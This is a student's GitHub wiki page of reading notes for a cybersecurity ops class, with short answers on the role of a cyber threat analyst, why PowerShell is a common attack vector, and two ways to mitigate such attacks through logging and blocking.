401 Class 20: Remote Code Execution - nataliabdallah/codefellows-ops-reading-notes GitHub Wiki

Home | README.md | Portfolio | |

Reading Cyber Threat Analyst: Key Job Skills and Expected Salary

Tracking, Detecting, and Thwarting PowerShell-based Malware and Attacks

You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?

  • I get paid to make sure the company's data on their computers and systems is secure. I do this by studying and analyzing past threats they have had, and other companies similar to the one I work for has had, and implement already known practices and policies to keep up with the latest security measures taken, and learn how to fortify and deal with any new vulnerabilities that arise, and come up with a plan to bring fortification for that vulnerability.

Explain what makes PowerShell such an effective attack vector.

  • PowerShell is just someone typing a sentence, or copy pasting a page of words that can make an Operating system do everything you do on the computer but faster, and more efficiently. It can be weaponized to take advantage of a company that doesn't know how computers work, and don't have policies and appropriate fortifications of their technology systems.

What are two things you can do to mitigate attacks that leverage PowerShell?

  1. implement monitoring all powershell logs and acitivity
  2. implement a program that can not just monitor, but block, thwart, and alert of activity that has the pattern of known threats and attacks.